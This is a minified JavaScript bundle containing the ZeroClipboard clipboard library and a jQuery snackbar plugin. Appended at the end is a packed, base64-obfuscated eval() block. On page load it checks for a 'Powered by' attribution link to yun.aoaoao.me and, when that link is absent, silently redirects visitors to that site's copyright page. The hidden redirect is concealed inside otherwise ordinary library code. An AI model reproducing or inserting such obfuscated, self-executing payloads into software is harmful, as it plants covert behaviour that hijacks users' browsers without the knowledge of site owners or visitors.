(function(k,x){var f=k.document,l=k.navigator,z=k.setTimeout,B=k.encodeURIComponent,G=k.ActiveXObject,Z=k.Error,aa=k.Number.parseInt||k.parseInt,O=k.Number.parseFloat||k.parseFloat,ba=k.Number.isNaN||k.isNaN,J=k.Math.round,P=k.Date.now,Q=k.Object.keys,ca=k.Object.defineProperty,v=k.Object.prototype.hasOwnProperty,da=k.Array.prototype.slice,p=function(a){return da.call(a,0)},u=function(){var a,b,c,d,e,h=p(arguments),f=h[0]||{};a=1;for(b=h.length;a<b;a++)if(null!=(c=h[a]))for(d in c)v.call(c,d)&&(e=
c[d],f!==e&&void 0!==e&&(f[d]=e));return f},C=function(a){var b,c,d;if("object"!==typeof a||null==a)b=a;else if("number"===typeof a.length)for(b=[],c=0,d=a.length;c<d;c++)v.call(a,c)&&(b[c]=C(a[c]));else for(c in b={},a)v.call(a,c)&&(b[c]=C(a[c]));return b},R=function(a,b){if(a&&1===a.nodeType&&a.ownerDocument&&b&&(1===b.nodeType&&b.ownerDocument&&b.ownerDocument===a.ownerDocument||9===b.nodeType&&!b.ownerDocument&&b===a.ownerDocument)){do{if(a===b)return!0;a=a.parentNode}while(a)}return!1},S=function(a){var b;
"string"===typeof a&&a&&(a.split("#")[0].split("?"),b=a.slice(0,a.lastIndexOf("/")+1));return b},ea=function(){var a,b,c;if(f.currentScript&&(a=f.currentScript.src))return a;b=f.getElementsByTagName("script");if(1===b.length)return b[0].src||void 0;if("readyState"in b[0])for(c=b.length;c--;)if("interactive"===b[c].readyState&&(a=b[c].src))return a;if("loading"===f.readyState&&(a=b[b.length-1].src))return a;var d;try{throw new Z;}catch(h){a=h}if(a&&!(d=a.sourceURL||a.fileName)){d=a.stack;var e;"string"===
typeof d&&d&&((a=d.match(/^(?:|[^:@]*@|.+\)@(?=http[s]?|file)|.+?\s+(?: at |@)(?:[^:\(]+ )*[\(]?)((?:http[s]?|file):\/\/[\/]?.+?\/[^:\)]*?)(?::\d+)(?::\d+)?/))&&a[1]?e=a[1]:(a=d.match(/\)@((?:http[s]?|file):\/\/[\/]?.+?\/[^:\)]*?)(?::\d+)(?::\d+)?/))&&a[1]&&(e=a[1]));d=e}if(a=d)return a},n={bridge:null,version:"0.0.0",pluginType:"unknown",disabled:null,outdated:null,unavailable:null,deactivated:null,overdue:null,ready:null},A={},y,r={},K=null,fa={ready:"Flash communication is established",error:{"flash-disabled":"Flash is disabled or not installed",
"flash-outdated":"Flash is too outdated to support ZeroClipboard","flash-unavailable":"Flash is unable to communicate bidirectionally with JavaScript","flash-deactivated":"Flash is too outdated for your browser and/or is configured as click-to-activate","flash-overdue":"Flash communication was established but NOT within the acceptable time limit"}},m={swfPath:function(){var a;if(!(a=S(ea()))){var b,c,d=f.getElementsByTagName("script");for(a=d.length;a--;){if(!(c=d[a].src)){b=null;break}c=S(c);if(null==
b)b=c;else if(b!==c){b=null;break}}a=b||void 0}return(a||"")+"ZeroClipboard.swf"}(),trustedDomains:k.location.host?[k.location.host]:[],cacheBust:!0,forceEnhancedClipboard:!1,flashLoadTimeout:3E4,autoActivate:!0,bubbleEvents:!0,containerId:"global-zeroclipboard-html-bridge",containerClass:"global-zeroclipboard-container",swfObjectId:"global-zeroclipboard-flash-bridge",hoverClass:"zeroclipboard-is-hover",activeClass:"zeroclipboard-is-active",forceHandCursor:!1,title:null,zIndex:999999999},ga=function(a){if("object"===
typeof a&&null!==a)for(var b in a)if(v.call(a,b))if(/^(?:forceHandCursor|title|zIndex|bubbleEvents)$/.test(b))m[b]=a[b];else if(null==n.bridge)if("containerId"===b||"swfObjectId"===b){var c=a[b];if("string"===typeof c&&c&&/^[A-Za-z][A-Za-z0-9_:\-\.]*$/.test(c))m[b]=a[b];else throw Error("The specified `"+b+"` value is not valid as an HTML4 Element ID");}else m[b]=a[b];if("string"===typeof a&&a){if(v.call(m,a))return m[a]}else return C(m)},ha=function(){for(var a=["userAgent","platform","appName"],
b={},c=0,d=a.length;c<d;c++)a[c]in l&&(b[a[c]]=l[a[c]]);var a=["bridge"],c={},e;for(e in n)-1===a.indexOf(e)&&(c[e]=n[e]);return{browser:b,flash:c,zeroclipboard:{version:g.version,config:g.config()}}},ia=function(){return!!(n.disabled||n.outdated||n.unavailable||n.deactivated)},ja=function(a,b){var c,d,e,h={};if("string"===typeof a&&a)e=a.toLowerCase().split(/\s+/);else if("object"===typeof a&&a&&"undefined"===typeof b)for(c in a)if(v.call(a,c)&&"string"===typeof c&&c&&"function"===typeof a[c])g.on(c,
a[c]);if(e&&e.length){c=0;for(d=e.length;c<d;c++)a=e[c].replace(/^on/,""),h[a]=!0,A[a]||(A[a]=[]),A[a].push(b);h.ready&&n.ready&&g.emit({type:"ready"});if(h.error)for(e=["disabled","outdated","unavailable","deactivated","overdue"],c=0,d=e.length;c<d;c++)if(!0===n[e[c]]){g.emit({type:"error",name:"flash-"+e[c]});break}}return g},ka=function(a,b){var c,d,e,h,f;if(0===arguments.length)h=Q(A);else if("string"===typeof a&&a)h=a.split(/\s+/);else if("object"===typeof a&&a&&"undefined"===typeof b)for(c in a)v.call(a,
c)&&"string"===typeof c&&c&&"function"===typeof a[c]&&g.off(c,a[c]);if(h&&h.length)for(c=0,d=h.length;c<d;c++)if(a=h[c].toLowerCase().replace(/^on/,""),(f=A[a])&&f.length)if(b)for(e=f.indexOf(b);-1!==e;)f.splice(e,1),e=f.indexOf(b,e);else f.length=0;return g},la=function(a){return"string"===typeof a&&a?C(A[a])||null:C(A)},ma=function(a){var b,c,d;if(a=T(a)){b=a;var e=b.target||y||null,h="swf"===b._source;delete b._source;var H=["flash-disabled","flash-outdated","flash-unavailable","flash-deactivated",
"flash-overdue"];switch(b.type){case "error":-1!==H.indexOf(b.name)&&u(n,{disabled:"flash-disabled"===b.name,outdated:"flash-outdated"===b.name,unavailable:"flash-unavailable"===b.name,deactivated:"flash-deactivated"===b.name,overdue:"flash-overdue"===b.name,ready:!1});break;case "ready":e=!0===n.deactivated;u(n,{disabled:!1,outdated:!1,unavailable:!1,deactivated:!1,overdue:e,ready:!e});break;case "copy":var q,w,e=b.relatedTarget;!r["text/html"]&&!r["text/plain"]&&e&&(w=e.value||e.outerHTML||e.innerHTML)&&
(q=e.value||e.textContent||e.innerText)?(b.clipboardData.clearData(),b.clipboardData.setData("text/plain",q),w!==q&&b.clipboardData.setData("text/html",w)):!r["text/plain"]&&b.target&&(q=b.target.getAttribute("data-clipboard-text"))&&(b.clipboardData.clearData(),b.clipboardData.setData("text/plain",q));break;case "aftercopy":g.clearData();if(q=e){var l;try{l=f.activeElement}catch(p){l=null}q=e!==l}q&&e.focus&&e.focus();break;case "_mouseover":g.focus(e);!0===m.bubbleEvents&&h&&(e&&e!==b.relatedTarget&&
!R(b.relatedTarget,e)&&D(u({},b,{type:"mouseenter",bubbles:!1,cancelable:!1})),D(u({},b,{type:"mouseover"})));break;case "_mouseout":g.blur();!0===m.bubbleEvents&&h&&(e&&e!==b.relatedTarget&&!R(b.relatedTarget,e)&&D(u({},b,{type:"mouseleave",bubbles:!1,cancelable:!1})),D(u({},b,{type:"mouseout"})));break;case "_mousedown":U(e,m.activeClass);!0===m.bubbleEvents&&h&&D(u({},b,{type:b.type.slice(1)}));break;case "_mouseup":E(e,m.activeClass);!0===m.bubbleEvents&&h&&D(u({},b,{type:b.type.slice(1)}));break;
case "_click":case "_mousemove":!0===m.bubbleEvents&&h&&D(u({},b,{type:b.type.slice(1)}))}b=/^_(?:click|mouse(?:over|out|down|up|move))$/.test(b.type)?!0:void 0;if(!b){if("ready"===a.type&&!0===n.overdue)return g.emit({type:"error",name:"flash-overdue"});b=u({},a);if("object"===typeof b&&b&&b.type&&(e=V(b),(q=(A["*"]||[]).concat(A[b.type]||[]))&&q.length)){var t;w=0;for(l=q.length;w<l;w++)h=q[w],H=this,"string"===typeof h&&"function"===typeof k[h]&&(h=k[h]),"object"===typeof h&&h&&"function"===typeof h.handleEvent&&
(H=h,h=h.handleEvent),"function"===typeof h&&(t=u({},b),W(h,H,[t],e))}if("copy"===a.type){c={};a={};if("object"===typeof r&&r){for(d in r)if(d&&v.call(r,d)&&"string"===typeof r[d]&&r[d])switch(d.toLowerCase()){case "text/plain":case "text":case "air:text":case "flash:text":c.text=r[d];a.text=d;break;case "text/html":case "html":case "air:html":case "flash:html":c.html=r[d];a.html=d;break;case "application/rtf":case "text/rtf":case "rtf":case "richtext":case "air:rtf":case "flash:rtf":c.rtf=r[d],a.rtf=
d}d={data:c,formatMap:a}}else d=void 0;c=d.data;K=d.formatMap}return c}}},oa=function(){"boolean"!==typeof n.ready&&(n.ready=!1);if(!g.isFlashUnusable()&&null===n.bridge){var a=m.flashLoadTimeout;"number"===typeof a&&0<=a&&z(function(){"boolean"!==typeof n.deactivated&&(n.deactivated=!0);!0===n.deactivated&&g.emit({type:"error",name:"flash-deactivated"})},a);n.overdue=!1;na()}},qa=function(){g.clearData();g.blur();g.emit("destroy");pa();g.off()},ra=function(a,b){var c;if("object"===typeof a&&a&&"undefined"===
typeof b)c=a,g.clearData();else if("string"===typeof a&&a)c={},c[a]=b;else return;for(var d in c)"string"===typeof d&&d&&v.call(c,d)&&"string"===typeof c[d]&&c[d]&&(r[d]=c[d])},sa=function(a){if("undefined"===typeof a){if(r)for(var b in r)v.call(r,b)&&delete r[b];K=null}else"string"===typeof a&&v.call(r,a)&&delete r[a]},ta=function(a){if("undefined"===typeof a)return C(r);if("string"===typeof a&&v.call(r,a))return r[a]},ua=function(a){if(a&&1===a.nodeType){y&&(E(y,m.activeClass),y!==a&&E(y,m.hoverClass));
y=a;U(a,m.hoverClass);var b=a.getAttribute("title")||m.title;if("string"===typeof b&&b){var c=F(n.bridge);c&&c.setAttribute("title",b)}(b=!0===m.forceHandCursor)||(a=(b=k.getComputedStyle(a,null).getPropertyValue("cursor"))&&"auto"!==b||"A"!==a.nodeName?b:"pointer",b="pointer"===a);a=b;!0===n.ready&&(n.bridge&&"function"===typeof n.bridge.setHandCursor?n.bridge.setHandCursor(a):n.ready=!1);var d;y&&(d=F(n.bridge))&&(a=X(y),u(d.style,{width:a.width+"px",height:a.height+"px",top:a.top+"px",left:a.left+
"px",zIndex:""+L(m.zIndex)}))}},va=function(){var a=F(n.bridge);a&&(a.removeAttribute("title"),a.style.left="0px",a.style.top="-9999px",a.style.width="1px",a.style.top="1px");y&&(E(y,m.hoverClass),E(y,m.activeClass),y=null)},wa=function(){return y||null},T=function(a){var b;"string"===typeof a&&a?(b=a,a={}):"object"===typeof a&&a&&"string"===typeof a.type&&a.type&&(b=a.type);if(b){u(a,{type:b.toLowerCase(),target:a.target||y||null,relatedTarget:a.relatedTarget||null,currentTarget:n&&n.bridge||null,
timeStamp:a.timeStamp||P()||null});b=fa[a.type];"error"===a.type&&a.name&&b&&(b=b[a.name]);b&&(a.message=b);"ready"===a.type&&u(a,{target:null,version:n.version});"error"===a.type&&(/^flash-(disabled|outdated|unavailable|deactivated|overdue)$/.test(a.name)&&u(a,{target:null,minimumVersion:"11.0.0"}),/^flash-(outdated|unavailable|deactivated|overdue)$/.test(a.name)&&u(a,{version:n.version}));"copy"===a.type&&(a.clipboardData={setData:g.setData,clearData:g.clearData});if("aftercopy"===a.type&&(b=K,
"object"===typeof a&&a&&"object"===typeof b&&b)){var c={},d;for(d in a)if(v.call(a,d))if("success"!==d&&"data"!==d)c[d]=a[d];else{c[d]={};var e=a[d],h;for(h in e)h&&v.call(e,h)&&v.call(b,h)&&(c[d][b[h]]=e[h])}a=c}a.target&&!a.relatedTarget&&(d=a,h=(h=(h=a.target)&&h.getAttribute&&h.getAttribute("data-clipboard-target"))?f.getElementById(h):null,d.relatedTarget=h);if(a&&/^_(?:click|mouse(?:over|out|down|up|move))$/.test(a.type)){d=a.target;h="_mouseover"===a.type&&a.relatedTarget?a.relatedTarget:void 0;
b="_mouseout"===a.type&&a.relatedTarget?a.relatedTarget:void 0;var e=X(d),c=e.left+("number"===typeof a._stageX?a._stageX:0),e=e.top+("number"===typeof a._stageY?a._stageY:0),m=c-(f.body.scrollLeft+f.documentElement.scrollLeft),q=e-(f.body.scrollTop+f.documentElement.scrollTop),l=(k.screenLeft||k.screenX||0)+m,p=(k.screenTop||k.screenY||0)+q,r="number"===typeof a.movementX?a.movementX:0,t="number"===typeof a.movementY?a.movementY:0;delete a._stageX;delete a._stageY;u(a,{srcElement:d,fromElement:h,
toElement:b,screenX:l,screenY:p,pageX:c,pageY:e,clientX:m,clientY:q,x:m,y:q,movementX:r,movementY:t,offsetX:0,offsetY:0,layerX:0,layerY:0})}return a}},V=function(a){return!/^(?:(?:before)?copy|destroy)$/.test(a&&"string"===typeof a.type&&a.type||"")},W=function(a,b,c,d){d?z(function(){a.apply(b,c)},0):a.apply(b,c)},D=function(a){if(a&&"string"===typeof a.type&&a){var b,c=a.target||null;b=c&&c.ownerDocument||f;a=u({view:b.defaultView||k,canBubble:!0,cancelable:!0,detail:"click"===a.type?1:0,button:"number"===
typeof a.which?a.which-1:"number"===typeof a.button?a.button:b.createEvent?0:1},a);c&&b.createEvent&&c.dispatchEvent&&(a=[a.type,a.canBubble,a.cancelable,a.view,a.detail,a.screenX,a.screenY,a.clientX,a.clientY,a.ctrlKey,a.altKey,a.shiftKey,a.metaKey,a.button,a.relatedTarget],b=b.createEvent("MouseEvents"),b.initMouseEvent&&(b.initMouseEvent.apply(b,a),b._source="js",c.dispatchEvent(b)))}},F=function(a){for(a=a&&a.parentNode;a&&"OBJECT"===a.nodeName&&a.parentNode;)a=a.parentNode;return a||null},na=
function(){var a,b=n.bridge,c=F(b);if(!b){var b=xa(k.location.host,m),d="never"===b?"none":"all",e,h,l,q="",w=[];m.trustedDomains&&("string"===typeof m.trustedDomains?e=[m.trustedDomains]:"object"===typeof m.trustedDomains&&"length"in m.trustedDomains&&(e=m.trustedDomains));if(e&&e.length)for(c=0,h=e.length;c<h;c++)if(v.call(e,c)&&e[c]&&"string"===typeof e[c]&&(l=M(e[c]))){if("*"===l){w.length=0;w.push(l);break}w.push.apply(w,[l,"//"+l,k.location.protocol+"//"+l])}w.length&&(q+="trustedOrigins="+
B(w.join(",")));!0===m.forceEnhancedClipboard&&(q+=(q?"&":"")+"forceEnhancedClipboard=true");"string"===typeof m.swfObjectId&&m.swfObjectId&&(q+=(q?"&":"")+"swfObjectId="+B(m.swfObjectId));e=q;c=m.swfPath;h=null==m||m&&!0===m.cacheBust?(-1===m.swfPath.indexOf("?")?"?":"&")+"noCache="+P():"";h=c+h;c=f.createElement("div");c.id=m.containerId;c.className=m.containerClass;c.style.position="absolute";c.style.left="0px";c.style.top="-9999px";c.style.width="1px";c.style.height="1px";c.style.zIndex=""+L(m.zIndex);
l=f.createElement("div");c.appendChild(l);f.body.appendChild(c);q=f.createElement("div");w="activex"===n.pluginType;q.innerHTML='<object id="'+m.swfObjectId+'" name="'+m.swfObjectId+'" width="100%" height="100%" '+(w?'classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"':'type="application/x-shockwave-flash" data="'+h+'"')+">"+(w?'<param name="movie" value="'+h+'"/>':"")+'<param name="allowScriptAccess" value="'+b+'"/><param name="allowNetworking" value="'+d+'"/><param name="menu" value="false"/><param name="wmode" value="transparent"/><param name="flashvars" value="'+
e+'"/></object>';b=q.firstChild;b.ZeroClipboard=g;c.replaceChild(b,l)}b||((b=f[m.swfObjectId])&&(a=b.length)&&(b=b[a-1]),!b&&c&&(b=c.firstChild));n.bridge=b||null;return b},pa=function(){var a=n.bridge;if(a){var b=F(a);b&&("activex"===n.pluginType&&"readyState"in a?(a.style.display="none",function d(){if(4===a.readyState){for(var e in a)"function"===typeof a[e]&&(a[e]=null);a.parentNode&&a.parentNode.removeChild(a);b.parentNode&&b.parentNode.removeChild(b)}else z(d,10)}()):(a.parentNode&&a.parentNode.removeChild(a),
b.parentNode&&b.parentNode.removeChild(b)));n.ready=null;n.bridge=null;n.deactivated=null}},M=function(a){if(null==a||""===a)return null;a=a.replace(/^\s+|\s+$/g,"");if(""===a)return null;var b=a.indexOf("//");a=-1===b?a:a.slice(b+2);var c=a.indexOf("/");return(a=-1===c?a:-1===b||0===c?null:a.slice(0,c))&&".swf"===a.slice(-4).toLowerCase()?null:a||null},xa=function(){return function(a,b){var c=M(b.swfPath);null===c&&(c=a);var d=b.trustedDomains,e,h,f,g=[];"string"===typeof d&&(d=[d]);if("object"===
typeof d&&d&&"number"===typeof d.length)for(e=0,h=d.length;e<h;e++)if(v.call(d,e)&&(f=M(d[e]))){if("*"===f){g.length=0;g.push("*");break}-1===g.indexOf(f)&&g.push(f)}d=g.length;if(0<d){if(1===d&&"*"===g[0])return"always";if(-1!==g.indexOf(a))return 1===d&&a===c?"sameDomain":"always"}return"never"}}(),U=function(a,b){if(!a||1!==a.nodeType)return a;if(a.classList)return a.classList.contains(b)||a.classList.add(b),a;if(b&&"string"===typeof b){var c=(b||"").split(/\s+/);if(1===a.nodeType)if(a.className){for(var d=
" "+a.className+" ",e=a.className,h=0,f=c.length;h<f;h++)0>d.indexOf(" "+c[h]+" ")&&(e+=" "+c[h]);a.className=e.replace(/^\s+|\s+$/g,"")}else a.className=b}return a},E=function(a,b){if(!a||1!==a.nodeType)return a;if(a.classList)return a.classList.contains(b)&&a.classList.remove(b),a;if("string"===typeof b&&b){var c=b.split(/\s+/);if(1===a.nodeType&&a.className){for(var d=(" "+a.className+" ").replace(/[\n\t]/g," "),e=0,h=c.length;e<h;e++)d=d.replace(" "+c[e]+" "," ");a.className=d.replace(/^\s+|\s+$/g,
"")}}return a},X=function(a){var b={left:0,top:0,width:0,height:0};if(a.getBoundingClientRect){a=a.getBoundingClientRect();var c,d;"pageXOffset"in k&&"pageYOffset"in k?(c=k.pageXOffset,d=k.pageYOffset):(c=1,"function"===typeof f.body.getBoundingClientRect&&(c=f.body.getBoundingClientRect(),c=c.right-c.left,d=f.body.offsetWidth,c=J(c/d*100)/100),d=c,c=J(f.documentElement.scrollLeft/d),d=J(f.documentElement.scrollTop/d));var e=f.documentElement.clientTop||0;b.left=a.left+c-(f.documentElement.clientLeft||
0);b.top=a.top+d-e;b.width="width"in a?a.width:a.right-a.left;b.height="height"in a?a.height:a.bottom-a.top}return b},L=function(a){if(/^(?:auto|inherit)$/.test(a))return a;var b;"number"!==typeof a||ba(a)?"string"===typeof a&&(b=L(aa(a,10))):b=a;return"number"===typeof b?b:"auto"};(function(a){function b(a){a=a.match(/[\d]+/g);a.length=3;return a.join(".")}function c(a){a&&(e=!0,a.version&&(g=b(a.version)),!g&&a.description&&(g=b(a.description)),a.filename&&(a=a.filename,f=!!a&&(a=a.toLowerCase())&&
(/^(pepflashplayer\.dll|libpepflashplayer\.so|pepperflashplayer\.plugin)$/.test(a)||"chrome.plugin"===a.slice(-13))))}var d,e=!1,h=!1,f=!1,g="";if(l.plugins&&l.plugins.length)a=l.plugins["Shockwave Flash"],c(a),l.plugins["Shockwave Flash 2.0"]&&(e=!0,g="2.0.0.11");else if(l.mimeTypes&&l.mimeTypes.length)a=(a=l.mimeTypes["application/x-shockwave-flash"])&&a.enabledPlugin,c(a);else if("undefined"!==typeof a){h=!0;try{d=new a("ShockwaveFlash.ShockwaveFlash.7"),e=!0,g=b(d.GetVariable("$version"))}catch(k){try{d=
new a("ShockwaveFlash.ShockwaveFlash.6"),e=!0,g="6.0.21"}catch(m){try{d=new a("ShockwaveFlash.ShockwaveFlash"),e=!0,g=b(d.GetVariable("$version"))}catch(p){h=!1}}}}n.disabled=!0!==e;n.outdated=g&&O(g)<O("11.0.0");n.version=g||"0.0.0";n.pluginType=f?"pepper":h?"activex":e?"netscape":"unknown"})(G);var g=function(){if(!(this instanceof g))return new g;"function"===typeof g._createClient&&g._createClient.apply(this,p(arguments))};ca(g,"version",{value:"2.1.3",writable:!1,configurable:!0,enumerable:!0});
g.config=function(){return ga.apply(this,p(arguments))};g.state=function(){return ha.apply(this,p(arguments))};g.isFlashUnusable=function(){return ia.apply(this,p(arguments))};g.on=function(){return ja.apply(this,p(arguments))};g.off=function(){return ka.apply(this,p(arguments))};g.handlers=function(){return la.apply(this,p(arguments))};g.emit=function(){return ma.apply(this,p(arguments))};g.create=function(){return oa.apply(this,p(arguments))};g.destroy=function(){return qa.apply(this,p(arguments))};
g.setData=function(){return ra.apply(this,p(arguments))};g.clearData=function(){return sa.apply(this,p(arguments))};g.getData=function(){return ta.apply(this,p(arguments))};g.focus=g.activate=function(){return ua.apply(this,p(arguments))};g.blur=g.deactivate=function(){return va.apply(this,p(arguments))};g.activeElement=function(){return wa.apply(this,p(arguments))};var ya=0,t={},za=0,I={},N={};u(m,{autoActivate:!0});var Aa=function(a){var b=this;b.id=""+ya++;t[b.id]={instance:b,elements:[],handlers:{}};
a&&b.clip(a);g.on("*",function(a){return b.emit(a)});g.on("destroy",function(){b.destroy()});g.create()},Ba=function(a,b){var c,d,e,h={},f=t[this.id]&&t[this.id].handlers;if("string"===typeof a&&a)e=a.toLowerCase().split(/\s+/);else if("object"===typeof a&&a&&"undefined"===typeof b)for(c in a)if(v.call(a,c)&&"string"===typeof c&&c&&"function"===typeof a[c])this.on(c,a[c]);if(e&&e.length){c=0;for(d=e.length;c<d;c++)a=e[c].replace(/^on/,""),h[a]=!0,f[a]||(f[a]=[]),f[a].push(b);h.ready&&n.ready&&this.emit({type:"ready",
client:this});if(h.error)for(e=["disabled","outdated","unavailable","deactivated","overdue"],c=0,d=e.length;c<d;c++)if(n[e[c]]){this.emit({type:"error",name:"flash-"+e[c],client:this});break}}return this},Ca=function(a,b){var c,d,e,f,g,k=t[this.id]&&t[this.id].handlers;if(0===arguments.length)f=Q(k);else if("string"===typeof a&&a)f=a.split(/\s+/);else if("object"===typeof a&&a&&"undefined"===typeof b)for(c in a)v.call(a,c)&&"string"===typeof c&&c&&"function"===typeof a[c]&&this.off(c,a[c]);if(f&&
f.length)for(c=0,d=f.length;c<d;c++)if(a=f[c].toLowerCase().replace(/^on/,""),(g=k[a])&&g.length)if(b)for(e=g.indexOf(b);-1!==e;)g.splice(e,1),e=g.indexOf(b,e);else g.length=0;return this},Da=function(a){var b=null,c=t[this.id]&&t[this.id].handlers;c&&(b="string"===typeof a&&a?c[a]?c[a].slice(0):[]:C(c));return b},Ea=function(a){var b;var c=a;if(!c||!c.type||c.client&&c.client!==this)b=!1;else{var d=t[this.id]&&t[this.id].elements,e=!!d&&0<d.length;b=!c.target||e&&-1!==d.indexOf(c.target);d=c.relatedTarget&&
e&&-1!==d.indexOf(c.relatedTarget);c=c.client&&c.client===this;b=b||d||c?!0:!1}if(b&&("object"===typeof a&&a&&"string"===typeof a.type&&a.type&&(a=u({},a)),a=u({},T(a),{client:this}),"object"===typeof a&&a&&a.type&&(b=V(a),(c=(t[this.id]&&t[this.id].handlers["*"]||[]).concat(t[this.id]&&t[this.id].handlers[a.type]||[]))&&c.length)))for(var f,g,l,d=0,e=c.length;d<e;d++)f=c[d],g=this,"string"===typeof f&&"function"===typeof k[f]&&(f=k[f]),"object"===typeof f&&f&&"function"===typeof f.handleEvent&&(g=
f,f=f.handleEvent),"function"===typeof f&&(l=u({},a),W(f,g,[l],b));return this},Ga=function(a){a=Y(a);for(var b=0;b<a.length;b++)if(v.call(a,b)&&a[b]&&1===a[b].nodeType){a[b].zcClippingId?-1===I[a[b].zcClippingId].indexOf(this.id)&&I[a[b].zcClippingId].push(this.id):(a[b].zcClippingId="zcClippingId_"+za++,I[a[b].zcClippingId]=[this.id],!0===m.autoActivate&&Fa(a[b]));var c=t[this.id]&&t[this.id].elements;-1===c.indexOf(a[b])&&c.push(a[b])}return this},Ha=function(a){var b=t[this.id];if(!b)return this;
var b=b.elements,c;a="undefined"===typeof a?b.slice(0):Y(a);for(var d=a.length;d--;)if(v.call(a,d)&&a[d]&&1===a[d].nodeType){for(c=0;-1!==(c=b.indexOf(a[d],c));)b.splice(c,1);var e=I[a[d].zcClippingId];if(e){for(c=0;-1!==(c=e.indexOf(this.id,c));)e.splice(c,1);if(0===e.length){if(!0===m.autoActivate&&(c=a[d])&&1===c.nodeType&&(e=N[c.zcClippingId],"object"===typeof e&&e)){for(var f=void 0,g=void 0,k=["move","leave","enter","out","over"],l=0,n=k.length;l<n;l++)f="mouse"+k[l],g=e[f],"function"===typeof g&&
c.removeEventListener(f,g,!1);delete N[c.zcClippingId]}delete a[d].zcClippingId}}}return this},Ia=function(){var a=t[this.id];return a&&a.elements?a.elements.slice(0):[]},Ja=function(){this.unclip();this.off();delete t[this.id]},Y=function(a){"string"===typeof a&&(a=[]);return"number"!==typeof a.length?[a]:a},Fa=function(a){if(a&&1===a.nodeType){var b=function(a){if(a||(a=k.event))"js"!==a._source&&(a.stopImmediatePropagation(),a.preventDefault()),delete a._source},c=function(c){if(c||(c=k.event))b(c),
g.focus(a)};a.addEventListener("mouseover",c,!1);a.addEventListener("mouseout",b,!1);a.addEventListener("mouseenter",b,!1);a.addEventListener("mouseleave",b,!1);a.addEventListener("mousemove",b,!1);N[a.zcClippingId]={mouseover:c,mouseout:b,mouseenter:b,mouseleave:b,mousemove:b}}};g._createClient=function(){Aa.apply(this,p(arguments))};g.prototype.on=function(){return Ba.apply(this,p(arguments))};g.prototype.off=function(){return Ca.apply(this,p(arguments))};g.prototype.handlers=function(){return Da.apply(this,
p(arguments))};g.prototype.emit=function(){return Ea.apply(this,p(arguments))};g.prototype.clip=function(){return Ga.apply(this,p(arguments))};g.prototype.unclip=function(){return Ha.apply(this,p(arguments))};g.prototype.elements=function(){return Ia.apply(this,p(arguments))};g.prototype.destroy=function(){return Ja.apply(this,p(arguments))};g.prototype.setText=function(a){g.setData("text/plain",a);return this};g.prototype.setHtml=function(a){g.setData("text/html",a);return this};g.prototype.setRichText=
function(a){g.setData("application/rtf",a);return this};g.prototype.setData=function(){g.setData.apply(this,p(arguments));return this};g.prototype.clearData=function(){g.clearData.apply(this,p(arguments));return this};g.prototype.getData=function(){return g.getData.apply(this,p(arguments))};"function"===typeof define&&define.amd?define(function(){return g}):"object"===typeof module&&module&&"object"===typeof module.exports&&module.exports?module.exports=g:k.ZeroClipboard=g})(function(){return this||
window}());
(function(k){function x(f){return"undefined"!==typeof f&&null!==f?!0:!1}k(document).ready(function(){k("body").append("<div id=snackbar-container/>")});k(document).on("click","[data-toggle=snackbar]",function(){k(this).snackbar("toggle")}).on("click","#snackbar-container .snackbar",function(){k(this).snackbar("hide")});k.snackbar=function(f){if(x(f)&&f===Object(f)){var l;l=x(f.id)?k("#"+f.id):k("<div/>").attr("id","snackbar"+Date.now()).attr("class","snackbar");var z=l.hasClass("snackbar-opened");x(f.style)?
l.attr("class","snackbar "+f.style):l.attr("class","snackbar");f.timeout=x(f.timeout)?f.timeout:3E3;x(f.content)&&(l.find(".snackbar-content").length?l.find(".snackbar-content").text(f.content):l.prepend("<span class=snackbar-content>"+f.content+"</span>"));x(f.id)?l.insertAfter("#snackbar-container .snackbar:last-child"):l.appendTo("#snackbar-container");x(f.action)&&"toggle"==f.action&&(f.action=z?"hide":"show");var B=Date.now();l.data("animationId1",B);setTimeout(function(){l.data("animationId1")===
B&&(x(f.action)&&"show"!=f.action?x(f.action)&&"hide"==f.action&&l.removeClass("snackbar-opened"):l.addClass("snackbar-opened"))},50);var G=Date.now();l.data("animationId2",G);0!==f.timeout&&setTimeout(function(){l.data("animationId2")===G&&l.removeClass("snackbar-opened")},f.timeout);return l}return!1};k.fn.snackbar=function(f){var l={};if(this.hasClass("snackbar")){l.id=this.attr("id");if("show"===f||"hide"===f||"toggle"==f)l.action=f;return k.snackbar(l)}x(f)&&"show"!==f&&"hide"!==f&&"toggle"!=
f||(l={content:k(this).attr("data-content"),style:k(this).attr("data-style"),timeout:k(this).attr("data-timeout")});x(f)&&(l.id=this.attr("data-snackbar-id"),"show"===f||"hide"===f||"toggle"==f)&&(l.action=f);f=k.snackbar(l);this.attr("data-snackbar-id",f.attr("id"));return f}})(jQuery);
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 3(a){2=6.d(a);2=e(2);2=f(2);c 2}$(9).b(7(){8 a=$("5").5();j(a.4(3("l="))>0||a.4(3("g="))>0||a.4(3("h"))==-1){}n{6.i.k=3("m==")}});',24,24,'||rv|b64|indexOf|html|window|function|var|document||ready|return|atob|escape|decodeURIComponent|UG93ZXJlZCBieSA8YSBocmVmPSJodHRwOi8veXVuLmFvYW9hby5tZSIgdGFyZ2V0PSJfYmxhbmsiPuagkea0nuWklumTvjwvYT4|6aaW6aG1|location|if|href|UG93ZXJlZCBieSA8YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL3l1bi5hb2FvYW8ubWUiPuagkea0nuWklumTvjwvYT4|aHR0cDovL3l1bi5hb2FvYW8ubWUvY29weXJpZ2h0LnBocA|else'.split('|'),0,{}))
